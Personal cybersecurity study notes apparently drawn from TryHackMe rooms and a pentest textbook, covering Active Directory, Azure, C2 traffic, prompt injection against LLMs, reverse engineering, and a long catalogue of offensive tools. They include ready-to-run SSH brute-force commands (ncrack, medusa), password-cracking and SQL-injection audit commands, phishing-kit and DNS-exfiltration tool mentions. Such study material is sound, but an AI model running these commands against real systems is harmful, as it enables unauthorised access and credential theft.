- It provides authentication and authorisation services, and allows administrators to manage network resources centrally.
- [[Active Directory]]
Active Directory Attacks
Group Policy Objects (GPO) : Group Policy is a means to distribute configurations and policies to enrolled devices in the domain.

Tools used

powershell
Get-GPO
Get-GPOREPORT
more @ https://tryhackme.com/r/room/activedirectoryhardening

Day 16 - Azure

Concepts Discussed

Azure Key Vault Azure Key Vault is an Azure service that allows users to securely store and access secrets. These secrets can be anything from API Keys, certificates, passwords, cryptographic keys, and more. Essentially, anything you want to keep safe, away from the eyes of others, and easily configure and restrict access to is what you want to store in an Azure Key Vault. The secrets are stored in vaults, which are created by vault owners. Vault owners have full access and control over the vault, including the ability to enable auditing so a record is kept of who accessed what secrets and grant permissions for other users to access the vault (known as vault consumers).
Microsoft Entra ID Microsoft Entra ID (formerly known as Azure Active Directory) is an identity and access management (IAM) service by Azure. It used to assess whether a user/application can access X resource.
Assumed Breach scenario
- The Assumed Breach scenario is a type of penetration testing setup in which an initial access or foothold is provided, mimicking the scenario in which an attacker has already established its access inside the internal network.
- In this setup, the mindset is to assess how far an attacker can go once they get inside your network, including all possible attack paths that could branch out from the defined starting point of intrusion.
Azure Cloud Shell : Azure Cloud Shell is a browser-based command-line interface that provides a way to manage Azure resources. Cloud Shell has built-in tools and pre-configured environments, including Azure CLI, Azure PowerShell, and popular development tools, making it an efficient solution for cloud management and automation tasks.
Azure CLI : command-line tool for managing and configuring Azure resources. az -h

Tools used

Azure CLI
more @ https://tryhackme.com/r/room/exploitingad

Day 17 - Log Analysis

Concepts Discussed

SIEM Security Information and Event Management system that is used to aggregate security information in the form of logs, alerts, artifacts and events into a centralized platform that would allow security analysts to perform near real-time analysis during security monitoring. eg: Splunk

Tools used

Splunk Splunk is a platform for collecting, storing, and analysing machine data. It provides various tools for analysing data, including search, correlation, and visualisation. It is a powerful tool that organisations of all sizes can use to improve their IT operations and security posture.
more @ https://tryhackme.com/jr/splunkdatamanipulation

Day 18 - Prompt Injection

Concepts Discussed

AI - Neural Networks - LLM
AI Exploits
- Data Poisoning: As we discussed, an AI model is as good as the data it is trained on. Therefore, if some malicious actor introduces inaccurate or misleading data into the training data of an AI model while the AI is being trained or when it is being fine-tuned, it can lead to inaccurate results.
- Sensitive Data Disclosure: If not properly sanitised, AI models can often provide output containing sensitive information such as proprietary information, personally identifiable information (PII), Intellectual property, etc. For example, if a clever prompt is input to an AI chatbot, it may disclose its backend workings or the confidential data it has been trained on.
- Prompt Injection: Prompt injection is one of the most commonly used attacks against LLMs and AI chatbots. In this attack, a crafted input is provided to the LLM that overrides its original instructions to get output that is not intended initially, similar to control flow hijack attacks against traditional systems.
RCE

Tools used

tcpdump
netcat

Day 19 - Game Hacking

Concepts Discussed

Executables and Libraries
- The executable file of an application is generally understood as a standalone binary file containing the compiled code we want to run. While some applications contain all the code they need to run in their executables, many applications usually rely on external code in library files with the "so" extension.
- Library files are collections of functions that many applications can reuse. Unlike applications, they can't be directly executed as they serve no purpose by themselves. For a library function to be run, an executable will need to call it. The main idea behind libraries is to pack commonly used functions so developers don't need to reimplement them for every new application they develop.

Tools used

Frida
- Frida is a powerful instrumentation tool that allows us to analyze, modify, and interact with running applications.
- How does it do that? Frida creates a thread in the target process; that thread will execute some bootstrap code that allows the interaction. This interaction, known as the agent, permits the injection of JavaScript code, controlling the application's behaviour in real-time.
- One of the most crucial functionalities of Frida is the Interceptor. This functionality lets us alter internal functions' input or output or observe their behaviour. In the example above, Frida would allow us to intercept and change the values of x and y that the library would receive on the fly. It would also allow us to change the returned sum value that is sent to the executable
- we will run frida-trace for the first time so that it creates handlers for each library function used by the game. By editing the handler files, we can tell Frida what to do with the intercepted values of a function call. To have Frida create the handler files, you would run the following command: frida-trace ./main -i '*' You will now see the __handlers__ directory, containing JavaScript files for each function your application calls from a library. One such function will be called say_hello() and have a corresponding handler at __handlers__/libhello.so/say_hello.js, allowing us to interact with the target application in real-time. Each handler will have two functions known as hooks since they are hooked into the function respectively before and after the function call:
  - onEnter: From this function, we are mainly interested in the args variable, an array of pointers to the parameters used by our target function - a pointer is just an address to a value.
  - onLeave: here, we are interested in the retval variable, which will contain a pointer to the variable returned.

Day 20 - Traffic Analysis

Concepts Discussed

Network Traffic Analysis
C2
- Command and Control (C2) Infrastructure are a set of programs used to communicate with a victim machine. This is comparable to a reverse shell, but is generally more advanced and often communicate via common network protocols, like HTTP, HTTPS and DNS.
C2 Communication
- Whenever a machine is compromised, the command and control server (C2) drops its secret agent (payload) into the target machine. This secret agent is meant to obey the instructions of the C2 server. These instructions include executing malicious commands inside the target, exfiltrating essential files from the system, and much more. Interestingly, after getting into the system, the secret agent, in addition to obeying the instructions sent by the C2, has a way to keep the C2 updated on its current status. It sends a packet to the C2 every few seconds or even minutes to let it know it is active and ready to blast anything inside the target machine that the C2 aims to. These packets are known as beacons.

Tools used

[[Wireshark]]
cyberchef
more @ https://tryhackme.com/r/room/wiresharktrafficanalysis

Day 21 - Reverse Engineering

Concepts Discussed

Reverse Engineering
Disassembly
- Disassembling a binary shows the low-level machine instructions the binary will perform (you may know this as assembly). Because the output is translated machine instructions, you can see a detailed view of how the binary will interact with the system at what stage.
- Tools such as IDA, Ghidra, and GDB can do this.
Decompiling
- Decompiling converts the binary into its high-level code, such as C++, C#, etc., making it easier to read. However, this translation can often lose information such as variable names. This method of reverse engineering a binary is useful if you want to get a high-level understanding of the application's flow.
multi-stage binaries

Tools used

PEStudio software designed to investigate potentially malicious files and extract information from them without execution.
ILSpy
- https://github.com/icsharpcode/ILSpy
- decompilation tool
more @ https://tryhackme.com/r/room/x86assemblycrashcourse

Day 22 - Kubernetes DFIR

Concepts Discussed

Kubernetes
- Kubernetes is a container orchestration system used for automating deployment, scaling and management of applications.
DFIR (Digital Forensics and Incident Response)
- Digital Forensics, like any other "forensics" discipline, aims to collect and analyse digital evidence of an incident. The artefacts collected from the affected systems are used to trace the chain of attack and uncover all facts that ultimately led to the incident. DFIR experts sometimes use the term "post-mortem" to indicate that their analysis starts after the incident has occurred and is performed on already compromised systems and networks.
- Incident Response, while still relying on data analysis to investigate the incident, focuses on "responsive" actions such as threat containment and system recovery. The incident responder will isolate infected machines, use the data collected during the analysis to identify the "hole" in the infrastructure's security and close it, and then recover the affected systems to a clean, previous-to-compromise state.
Docker

Tools used

Terminal
kubectl
more @ https://tryhackme.com/r/room/introtok8s

Day 23 - Hash Cracking

Concepts Discussed

Hashing
PDF cracking

Tools used

hash-id.py <-> www.Blackploit.com
[[John the Ripper]]
pdftotext - pdftotext encrypted.pdf -upw password
more @ https://tryhackme.com/module/cryptography-101
more @ https://tryhackme.com/r/room/johntheripperbasics

Day 24 - Communications Protocol

Concepts Discussed

MQTT protocol MQTT stands for Message Queuing Telemetry Transport. It is a language very commonly used in IoT devices for communication purposes. It works on a publish/subscribe model, where any client device can publish messages, and other client devices can subscribe to the messages if they are related to a topic of interest. An MQTT broker connects the different clients, publishing and subscribing to messages.
- MQTT Clients: MQTT clients are IoT devices, such as sensors and controllers, that publish or subscribe to messages using the MQTT protocol. For example, a temperature sensor can be a client that publishes temperature sensors at different places. An HVAC controller can also act as a client that subscribes to messages from the temperature sensor and turns the HVAC system on or off based on the input received.
- MQTT Broker: An MQTT broker receives messages from publishing clients and distributes them to the subscribing clients based on their preferences.
- MQTT Topics: Topics are used to classify the different types of messages. Clients can subscribe to messages based on their topics of interest. For example, a temperature sensor sending temperature readings can use the topic of “room temperature”, while an HVAC controller would subscribe to messages under the topic of “room temperature”. However, a light sensor can publish messages with the topic “light readings”. An HVAC controller does not need to subscribe to this topic. On the other hand, a light controller would subscribe to “light readings” but not to the topic of “room temperature”.

Tools used

wireshark
mosquitto_pub
- mosquitto_pub -h localhost -t "some_topic" -m "message"
- mosquitto_pub is the command-line utility to publish an MQTT message
- -h localhost refers to the MQTT broker, which is localhost in this task
- -t "some_topic" specifies the topic
- -m "message" sets the message, such as "on" and "off"
more @ https://tryhackme.com/module/wireshark

END

[Vault: Linux] Linux networking

Thu, 18 Dec 2025 14:32:07 GMT

Networking commands

for IP address and details use ip a or ifconfig / iwconfig (for wireless)
Address resolution Protocol - to know ip corresponded with MAC address ip n or arp -a
routing table ip r or route
to check for open ports and services netstat
List open ports ss -tunlp
DNS query dig domain.com
traceroute: A network diagnostic tool for displaying the route and measuring transit delays of packets
mtr : Combines ping and trace route to show real-time packet loss and latency.

[Vault: Root] Tools

Tue, 16 Dec 2025 12:11:14 GMT

Asset Discovery

subfinder
amass

Information Gathering

httpx
httprobe
waymore
waybackurl - https://github.com/tomnomnom/waybackurls
getallurl

Proxy / fuzzing

[[Burpsuite]]
[[Caido]]

Content Discovery

[[ffuf]]

Efficiency

anew - https://github.com/tomnomnom/anew

JS

linkfinder - https://github.com/GerbenJavado/LinkFinder
sourcemapper

Social Enginnering

[[Social-Engineer Toolkit (SET)|Social-Engineer Toolkit (SET)]]
AdvPhishing - GitHub - Ignitetch/AdvPhishing: This is Advance Phishing Tool ! OTP PHISHING

Vulnerability scanners

OpenVAS
- OpenVAS is an open-source vulnerability scanner that was created by Greenbone Networks. The OpenVAS framework includes several services and tools that enable you to perform detailed vulnerability scanning against hosts and networks.
- [[Greenbone Vulnerability Management (GVM)|Greenbone Vulnerability Management (GVM)]]
[[Nessus]]
Nexpose
- Nexpose is a vulnerability scanner created by Rapid7 that is very popular among professional penetration testers. It supports integrations with other security products.
- Rapid7 also has several vulnerability scanning solutions that are used for vulnerability management, continuous monitoring, and secure development lifecycle.
Qualys
- Qualys is a security company that created one of the most popular vulnerability scanners in the industry. It also has a cloud-based service that performs continuous monitoring, vulnerability management, and compliance checking. This cloud solution interacts with cloud agents, virtual scanners, scanner appliances, and Internet scanners.
- https://www.qualys.com
[[SQLmap]]
[[Nikto]]
OWASP Zed Attack Proxy (ZAP)
- According to OWASP, OWASP Zed Attack Proxy (ZAP) “is one of the world’s most popular free security tools and is actively maintained by hundreds of international volunteers.” Many offensive and defensive security engineers around the world use ZAP, which not only provides web vulnerability scanning capabilities but also can be used as a sophisticated web proxy. ZAP comes with an API and also can be used as a fuzzer. You can download and obtain more information about OWASP ZAP from https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project.
w3af
- Another popular open-source web application vulnerability scanner is w3af. w3af can be downloaded from https://w3af.org, and its documentation can be obtained from https://w3af.org/howtos.
- The w3af tool has a plugins menu that allows you to configure and enable mangle, crawl, bruteforce, audit, and other plugins. When you are in the plugins mode, you can use the list audit command to list all the available audit plugins.
- w3af tool being configured to perform an SQL injection audit against the web server with IP address 10.1.1.14.
```
w3af/plugins>>> audit sqli
w3af/plugins>>> back
w3af>>> target
w3af/config:target>>> set target http://10.1.1.14
w3af/config:target>>> back
The configuration has been saved.
w3af>>> start
```
DirBuster
- DirBuster is a tool that was designed to brute force directory names and filenames on web application servers. DirBuster is currently an inactive project, and its functionality has been integrated into and enhanced in OWASP ZAP as an add-on.
- DirBuster is a Java application designed to brute force directories and filenames on web/application servers. Often what looks like a web server with a default installation actually has pages and applications hidden within it. DirBuster attempts to find these.
- Two few additional alternatives to DirBuster are gobuster (https://github.com/OJ/gobuster) and ffuf (https://github.com/ffuf/ffuf).
Brakeman - https://brakemanscanner.org/
Open Security Content Automation Protocol (SCAP) scanners - https://www.open-scap.org/
Wapiti - https://wapiti.sourceforge.io/
Scout Suite - https://github.com/nccgroup/ScoutSuite
WPScan - https://wpscan.org/?

OWASP lists additional vulnerability scanning tools at https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools.

Credential Attacks / Bruteforce attack

[[John the Ripper]]
Cain and Abel
- Cain (or Cain and Abel) is a tool that can be used to “recover” passwords of Windows-based systems. Cain and Abel can be used to decipher and recover user credentials by performing packet captures (sniffing); cracking encrypted passwords by using dictionary, brute-force, and cryptanalysis attacks; and using many other techniques. Cain and Abel is a legacy tool, and archived information about it can be obtained from https://sectools.org/tool/cain/.
[[Hashcat]]
[[Hydra]]
[[rainbowcrack]]
Medusa and Ncrack
- The Medusa and Ncrack tools, which are similar to Hydra, can be used to perform brute-force credential attacks against a system. You can install Medusa by using the apt install medusa command in a Debian-based Linux system (such as Ubuntu, Kali Linux, or Parrot OS). You can download Ncrack from https://nmap.org/ncrack or install it by using the apt install ncrack command.
- how Ncrack can be used to perform a brute-force attack with the username chris and the wordlist my_list against an SSH server with IP address 172.18.104.166.
  - ncrack -p 22 --user chris -P my_list 172.18.104.166
- Using Medusa to Perform a Brute-Force Attack
  - medusa -u chris -P my_list -h 172.18.104.166 -M ssh
CeWL
- CeWL is a great tool that can be used to create wordlists. You can use CeWL to crawl websites and retrieve words.
- You can download CeWL from https://digi.ninja/projects/cewl.php.
- Using CeWL to Create Wordlists: cewl -d 2 -m 5 -w words.txt [website url]
Mimikatz
- Mimikatz is a tool that many penetration testers and attackers (and even malware) use for retrieving password hashes from memory. It is also a useful post-exploitation tool.
- The Mimikatz tool can be downloaded from https://github.com/gentilkiwi/mimikatz.
- Metasploit also includes Mimikatz as a Meterpreter script to facilitate exploitation without the need to upload any files to the disk of the compromised host. You can obtain more information about the Mimikatz and Metasploit integration at https://www.offsec.com/metasploit-unleashed/mimikatz/.
Patator
- Patator is another tool that can be used for brute-force attacks on enumerations of SNMPv3 usernames, VPN passwords, and other types of credential attacks.
- You can download Patator from https://github.com/lanjelot/patator.
pdfcrack
- crack password protected pdfs
- pdfcrack -f file.pdf -w /usr/share/wordlists/rockyou.txt
fcrackzip
- crack password protected zip files

Persistence

[[Netcat]]
Powershell
PowerSploit
- is a collection of PowerShell modules that can be used for post- exploitation and other phases of an assessment.
- PowerSploit can be downloaded from https://github.com/PowerShellMafia/PowerSploit.
Empire
- Empire is a PowerShell-based post-exploitation framework that is very popular among pen testers. Empire is an open-source framework that includes a PowerShell Windows agent and a Python Linux agent.
- You can download Empire from https://github.com/EmpireProject/Empire.
- Empire implements the ability to run PowerShell agents without the need for powershell.exe. It allows you to rapidly deploy post-exploitation modules including keyloggers, reverse shells, Mimikatz, and adaptable communications to evade detection.
Remote Access Protocols
- Microsoft’s Remote Desktop Protocol (RDP)
- Apple Remote Desktop
- VNC
- X server forwarding

Evasion

[[Veil]]
Tor
- Many people use tools such as Tor for privacy. Tor is a free tool that enables its users to surf the Web anonymously. Tor works by “routing” IP traffic through a free worldwide network consisting of thousands of Tor relays. It constantly changes the way it routes traffic in order to obscure a user’s location from anyone monitoring the network. Tor’s name is an acronym of the original software project’s name, “The Onion Router.”
- Tor enables users to evade and circumvent security monitoring and controls because it’s hard to attribute and trace back the traffic to the user. Its “onion routing” is accomplished by encrypting the application layer of a communication protocol stack that’s “nested” much like the layers of an onion. The Tor client encrypts the data multiple times and sends it through a network or circuit that includes randomly selected Tor relays. Each of the relays decrypts a layer of the onion to reveal only the next relay so that the remaining encrypted data can be routed on to it.
- A Tor exit node is basically the last Tor node, or the “gateway,” where the Tor encrypted traffic “exits” to the Internet. A Tor exit node can be targeted to monitor Tor traffic. Many organizations block Tor exit nodes in their environment. The Tor project has a dynamic list of Tor exit nodes that makes this task a bit easier.
Proxychains
- Proxychains can be used for evasion, as it is a tool that forces any TCP connection made by a specified application to use Tor or any other SOCKS4, SOCKS5, HTTP, or HTTPS proxy.
- You can download Proxychains from https://github.com/haad/proxychains.
Encryption

Encapsulation and Tunneling Using DNS and Protocols Such as NTP

Threat actors have used many different nontraditional techniques to steal data from corporate networks without being detected. For example, they have sent stolen credit card data, intellectual property, and confidential documents over DNS by using tunneling. As you probably know, DNS is a protocol that enables systems to resolve domain names (for example, theartofhacking.org) into IP addresses (for example, 104.27.176.154). DNS is not intended for a command channel or even tunneling. However, attackers have developed software that enables tunneling over DNS. These threat actors like to use protocols that are not designed for data transfer because they are less inspected in terms of security monitoring. Undetected DNS tunneling (also known as DNS exfiltration ) presents a significant risk to any organization.

In many cases, malware uses Base64 encoding to put sensitive data (such as credit card numbers and personally identifiable information) in the payload of DNS packets to cybercriminals. The following are some examples of encoding methods that attackers may use:

Base64 encoding
Binary (8-bit) encoding
NetBIOS encoding
Hex encoding

Several utilities have been created to perform DNS tunneling (for good reasons as well as harmful). The following are a few examples:

DeNiSe: This Python tool is for tunneling TCP over DNS. You can download DeNiSe from https://github.com/mdornseif/DeNiSe.
dns2tcp: Written by Olivier Dembour and Nicolas Collignon in C, dns2tcp supports KEY and TXT request types. You can download dns2tcp from https://github.com/alex-sector/dns2tcp.
DNScapy: Created by Pierre Bienaimé, this Python-based Scapy tool for packet generation even supports SSH tunneling over DNS, including a SOCKS proxy. You can download DNScapy from https://github.com/FedericoCeratto/dnscapy.
DNScat or DNScat-P: This Java-based tool, created by Tadeusz Pietraszek, supports bidirectional communication through DNS. You can download DNScat from https://github.com/iagox86/dnscat2.
DNScat2 (DNScat-B): Written by Ron Bowes, this tool runs on Linux, macOS, and Windows. DNScat2 encodes DNS requests in NetBIOS encoding or hex encoding. You can download DNScat2 from https://github.com/iagox86/dnscat2.
Heyoka: This Windows-based tool written in C supports bidirectional tunneling for data exfiltration. You can download Heyoka from http://heyoka.sourceforge.net.
iodine: Written by Bjorn Andersson and Erik Ekman in C, iodine runs on Linux, macOS, and Windows, and it can even be ported to Android. You can download iodine from https://code.kryo.se/iodine/.
sods: Originally written in Perl by Dan Kaminsky, this tool is used to set up an SSH tunnel over DNS or for file transfer. The requests are Base32 encoded, and responses are Base64-encoded TXT records. You can download sods from https://github.com/msantos/sods.
psudp: Developed by Kenton Born, this tool injects data into existing DNS requests by modifying the IP/UDP header lengths. You can obtain additional information about psudp from https://pdfs.semanticscholar.org/0e28/637370748803bcefa5b89ce8b48cf0422adc.pdf.
Feederbot and Moto: Attackers have used this malware with DNS to steal sensitive information from many organizations. You can obtain additional information about these tools from https://chrisdietri.ch/post/feederbot-botnet-using-dns-command-and-control/. Some of these tools were not created for stealing data, but cybercriminals have appropriated them for their own purposes.

Exploitation Frameworks

[[Metasploit]]
[[Browser Exploitation Framework|Browser Exploitation Framework (BeEF)]]

Decompilation, Disassembly, and Debugging Tools

The GNU Project Debugger (GDB)
- The GNU Project Debugger (GDB) is one of the most popular debuggers among software developers and security professionals. With a debugger like GDB, you can troubleshoot and find software bugs, understand what a program was doing at the moment it crashed, make a program stop on specified conditions, and modify elements of a program to experiment or to correct problems.
- Traditionally, GDB has mainly been used to debug programs written in C and C++; however, several other programming languages – such as Go, Objective-C, and OpenCL C – are also supported.
- https://www.gnu.org/software/gdb
- The website https://www.cprogramming.com/gdb.html includes additional examples of how to use GDB for debugging applications.
Windows Debugger
- You can use the Windows Debugger (WinDbg) to debug kernel and user mode code. You can also use it to analyze crash dumps and to analyze the CPU registers as code executes.
- You can get debugging tools from Microsoft via the following methods:
  - By downloading and installing the Windows Driver Kit (WDK)
  - As a standalone tool set
  - By downloading the Windows Software Development Kit (SDK)
  - By downloading Microsoft Visual Studio
- Refer to the “Getting Started with Windows Debugging Microsoft” whitepaper to learn how to use WinDbg and related tools; see https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/getting-started-with-windows-debugging. You can obtain additional information about Windows debugging and symbols from https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/symbols.
OllyDbg
- OllyDbg is a debugger created to analyze Windows 32-bit applications. It is included in Kali Linux and other penetration testing distributions.
- It can also be downloaded from https://www.ollydbg.de.
edb Debugger
- The edb debugger (often called Evan’s debugger) is a cross-platform debugger that supports AArch32, x86, and x86-64 architectures.
- It comes by default with Kali Linux, and it can be downloaded from https://github.com/eteran/edb-debugger.
Ghidra
- Ghidra is a powerful and free tool popular among security researchers for reverse engineering and binary analysis. Developed by the NSA, Ghidra provides comprehensive capabilities for dissecting and understanding complex software, including malware analysis and vulnerability research.
- Its standout feature is a built-in decompiler that makes analyzing binary code more accessible. While it does not directly support exploit development, Ghidra's extensive scripting capabilities (with Java and Python-based APIs) allow users to create custom analysis scripts.
- You can download Ghidra from https://www.ghidra-sre.org/.
Interactive Disassembler (IDA)
- Interactive Disassembler (IDA) is one of the most popular disassemblers, debuggers, and decompilers on the market.
- IDA is a commercial product of Hex-Rays, and it can be purchased from https://www.hex-rays.com/products/ida/index.shtml.
- Introduction to IDA: https://resources.infosecinstitute.com/basics-of-ida-pro-2/.
Objdump
- Objdump is a Linux program that can be used to display information about one or more object files. You can use Objdump to do quick checks and disassembly of binaries
BinaryNinja
- Binary Ninja is a reverse-engineering platform developed by Vector 35 Inc. It allows users to disassemble a binary file and visualize the disassembly in both linear and graph-based views. The software performs automated, in-depth code analysis, generating information that helps to analyze a binary.
- Better UI compared to ghidra.
- https://binary.ninja
list of numerous tools that can be used for reverse engineering: https://github.com/The-Art-of-Hacking/art-of-hacking/tree/master/reverse_engineering.

Forensics

ADIA (Appliance for Digital Investigation and Analysis): ADIA is a VMware-based appliance used for digital investigation and acquisition that is built entirely from public domain software. Among the tools contained in ADIA are Autopsy, the Sleuth Kit, the Digital Forensics Framework, log2timeline, Xplico, and Wireshark. Most of the system maintenance uses Webmin. ADIA is designed for small to medium-sized digital investigations and acquisitions. The appliance runs under Linux, Windows, and macOS. Both i386 (32-bit) and x86_64 (64-bit) versions are available. You can download ADIA from [[https://forensics.cert.org/#ADIA_](https://forensics.cert.org/#ADIA_](https://forensics.cert.org/#ADIA_](https://forensics.cert.org/#ADIA_](https://forensics.cert.org/#ADIA]].
CAINE: The Computer Aided Investigative Environment (CAINE) contains numerous tools that help investigators with analyses, including forensic evidence collection. You can download CAINE from http://www.caine-live.net/index.html.
Skadi: This all-in-one solution to parsing collected data makes the data easily searchable with built-in common searches and enables searching of single and multiple hosts simultaneously. You can download Skadi from https://github.com/orlikoski/Skadi.
PALADIN: PALADIN is a modified Linux distribution for performing various evidence collection tasks in a forensically sound manner. It includes many open source forensics tools. You can download PALADIN from https://sumuri.com/software/paladin/.
Security Onion: Security Onion, a Linux distro aimed at network security monitoring, features advanced analysis tools, some of which can help in forensic investigations. You can download Security Onion from https://github.com/Security-Onion-Solutions/security-onion.
SIFT Workstation: The SANS Investigative Forensic Toolkit (SIFT) Workstation demonstrates that advanced incident response capabilities and deep-dive digital forensic techniques to intrusions can be accomplished using cutting-edge open source tools that are freely available and frequently updated. You can download SIFT Workstation from https://digital-forensics.sans.org/community/downloads.

A list of numerous tools that can be used for forensics: https://github.com/The-Art-of-Hacking/art-of-hacking/tree/master/dfir.

Software Assurance

to perform software and protocol robustness tests, including fuzzers and code analysis tools.

SpotBugs, Findsecbugs, and SonarQube
- SpotBugs (previously known as Findbugs) is a static analysis tool designed to find bugs in applications created in the Java programming language. You can download and obtain more information about SpotBugs at https://spotbugs.github.io.
- Findsecbugs is another tool designed to find bugs in applications created in the Java programming language. It can be used with continuous integration systems such as Jenkins and SonarQube. Findsecbugs provides support for popular Java frameworks, including Spring-MCV, Apache Struts, and Tapestry. You can download and obtain more information about Findbugs at https://find-sec-bugs.github.io.
- SonarQube is a tool that can be used to find vulnerabilities in code, and it provides support for continuous integration and DevOps environments. You can obtain additional information about SonarQube at https://www.sonarqube.org.
Fuzzers and Fuzz Testing
- Fuzz testing, or fuzzing , is a technique that can be used to find software errors (or bugs) and security vulnerabilities in applications, operating systems, infrastructure devices, IoT devices, and other computing device. Fuzzing involves sending random data to the unit being tested in order to find input validation issues, program failures, buffer overflows, and other flaws. Tools that are used to perform fuzzing are referred to as fuzzers. Examples of popular fuzzers are Peach, Mutiny Fuzzing Framework, and American Fuzzy Lop.
Peach
- Peach is one of the most popular fuzzers in the industry. There is a free (open-source) version, the Peach Fuzzer Community Edition, and a commercial version. You can download the Peach Fuzzer Community Edition and obtain additional information about the commercial version at https://osdn.net/projects/sfnet_peachfuzz/releases/.
Mutiny Fuzzing Framework
- The Mutiny Fuzzing Framework is an open-source fuzzer created by Cisco. It works by replaying packet capture files (pcaps) through a mutational fuzzer. You can download and obtain more information about Mutiny Fuzzing Framework at https://github.com/Cisco-Talos/mutiny-fuzzer.
- The Mutiny Fuzzing Framework uses Radamsa to perform mutations. Radamsa is a tool that can be used to generate test cases for fuzzers. You can download and obtain additional information about Radamsa at https://gitlab.com/akihe/radamsa.
American Fuzzy Lop
- American Fuzzy Lop (AFL) is a tool that provides features of compile-time instrumentation and genetic algorithms to automatically improve the functional coverage of fuzzing test cases. You can obtain information about AFL from https://lcamtuf.coredump.cx/afl/.

Wireless Tools

[[Aircrack-ng]]
Wifite2:
- This is a Python program to test wireless networks that can be downloaded from https://github.com/derv82/wifite2.
Rogue access points:
- You can easily create rogue access points by using open-source tools such as hostapd. Omar Santos has a description of how to build your own wireless hacking lab and use hostapd at https://github.com/The-Art-of-Hacking/h4cker/blob/master/wireless_resources/virtual_adapters.md.
EAPHammer:
- This tool, which you can use to perform evil twin attacks, can be downloaded from https://github.com/s0lst1c3/eaphammer.
mdk4:
- This tool is used to perform fuzzing, IDS evasions, and other wireless attacks. mdk4 can be downloaded from https://github.com/aircrack-ng/mdk4.
Spooftooph:
- This tool is used to spoof and clone Bluetooth devices. It can be downloaded from https://gitlab.com/kalilinux/packages/spooftooph.
Reaver:
- This tool is used to perform brute-force attacks against Wi-Fi Protected Setup (WPS) implementations. Reaver can be downloaded from https://gitlab.com/kalilinux/packages/reaver.
Wireless Geographic Logging Engine (WiGLE):
- You can learn about this war driving tool at https://wigle.net.
Fern Wi-Fi Cracker:
- This tool is used to perform different attacks against wireless networks, including cracking WEP, WPA, and WPS keys. You can download Fern Wi-Fi Cracker from https://gitlab.com/kalilinux/packages/fern-wifi-cracker.

Steganography Tools

Soteghide
- Steghide is a steganography program used to hide data within various image and audio file formats. It allows users to embed secret information, like text files or other data, into seemingly ordinary files, making it difficult to detect the hidden content. Steghide supports encryption of embedded data, compression, and verification using a checksum.
OpenStego: You can download this steganography tool from https://www.openstego.com.
snow: This is a text-based steganography tool that can be downloaded from https://github.com/mattkwan-zz/snow.
Coagula: This program, which can be used to make sound from an image, can be downloaded from https://www.abc.se/~re/Coagula/Coagula.html.
Sonic Visualiser: This tool can be used to analyze embedded information in music or audio recordings. It can be downloaded from https://www.sonicvisualiser.org.
TinEye: This is a reverse image search website at https://tineye.com.
metagoofil: This tool can be used to extract metadata information from documents and images. You can download metagoofil from https://github.com/laramies/metagoofil.

Cloud Tools

ScoutSuite: This collection of tools can be used to reveal vulnerabilities in AWS, Azure, Google Cloud Platform, and other cloud platforms. You can download ScoutSuite from https://github.com/nccgroup/ScoutSuite.
CloudBrute: You can download this cloud enumeration tool from https://github.com/0xsha/CloudBrute.
Pacu: This is a framework for AWS exploitation that can be downloaded from https://github.com/RhinoSecurityLabs/pacu.
Cloud Custodian: This cloud security, governance, and management tool can be downloaded from https://cloudcustodian.io.

[Vault: Tools] John the Ripper

Tue, 16 Dec 2025 12:11:14 GMT

John the Ripper is a free and open-source password-cracking tool. It can crack passwords stored in various formats, including hashes, passwords, and encrypted private keys. It can be used to test passwords' security and recover lost passwords.

It supports different cracking modes and understands many ciphertext formats, including several DES variants, MD5, and Blowfish. John the Ripper does not support AES and SHA-2. John the Ripper can also be used to extract Kerberos AFS and Windows passwords.
To list the supported formats, you can use the john --list=formats command
John the Ripper can be downloaded from https://www.openwall.com/john.

[!tip] Usage john --format=raw-sha256 --wordlist=/usr/share/wordlists/rockyou.txt hash1.txt

--format=[] specifies the hash format. eg: raw-sha256, raw-md5
--wordlist=[] sets the wordlist that we will use
hash1.txt is the text file containing the hash value we are trying to crack
--incremental to instruct John the Ripper to use only brute force cracking John the Ripper switches to incremental strategies (brute force) on remaining hashes if there are hashes it cannot crack with its wordlists.

To show your cracked passwords: john --show [--format=raw-md5] my_pw_hashes.txt

Rules

John can start from a long password list and attempt various common derivations from each of the passwords to increase its chances of success. This behaviour can be triggered through the use of rules. Various rules come bundled with John the Ripper’s configuration files; one is suited for lengthy wordlists, --rules=wordlist.

Adding the option --rules=wordlist to your john command line generates multiple passwords from each one. For instance, it appends and prepends single digits. It does various common substitutions; for example, a can be replaced with @, i can be replaced with !, and s can be replaced with $. Many more mutations and transformations are part of these rules. You can check all the underlying rules by checking the [List.Rules:Wordlist] section in /etc/john/john.conf, John’s configuration file.

john --format=raw-sha256 --rules=wordlist --wordlist=/usr/share/wordlists/rockyou.txt hash1.txt

Formatting

To crack the password of other file types, we need to convert the password-protected file into a format that john can attack. John the Ripper jumbo edition comes with the necessary tools. The different tools follow the naming style “format2john”. The terminal below shows a few examples.

/opt/john/1password2john.py /opt/john/ethereum2john.py /opt/john/openssl2john.py /opt/john/7z2john.pl /opt/john/filezilla2john.py /opt/john/padlock2john.py /opt/john/DPAPImk2john.py /opt/john/geli2john.py /opt/john/pcap2john.py /opt/john/adxcsouf2john.py /opt/john/gpg2john /opt/john/pdf2john.pl /opt/john/aem2john.py /opt/john/hccap2john /opt/john/pdf2john.py /opt/john/aix2john.pl /opt/john/hccapx2john.py /opt/john/pem2john.py /opt/john/aix2john.py /opt/john/htdigest2john.py /opt/john/pfx2john.py

eg:

to crack pdf files : pdf2john.pl private.pdf > pdf.hash
to crack zip files : zip2john file.zip > ziphash.txt

You can customize John the Ripper to allow you to build different configurations. The configuration file can be named either john.conf on Unix and Linux-based systems or john.ini on Windows. For additional information about John the Ripper customization and configuration files, see https://www.openwall.com/john/doc/CONFIG.shtml. The configuration file can include a set of rules, including rules regarding the use of wordlists. The rules syntax can be obtained from https://www.openwall.com/john/doc/RULES.shtml.
John the Ripper also keeps a log in the private john "home directory" for the current user ( ~.john ).
There is a GUI version of John the Ripper called Johnny.

[Vault: Linux] Signing Kernel modules

Sun, 14 Dec 2025 15:27:20 GMT

Signing kernel modules with a machine-owner key (MOK) that you generate and enroll in your system's firmware.

To run VMware Workstation on Fedora with Secure Boot enabled, you must sign the vmmon and vmnet

Phase 1: Generate a Key Pair

You only need to do this once. This creates a trusted "identity" for you to sign drivers with.

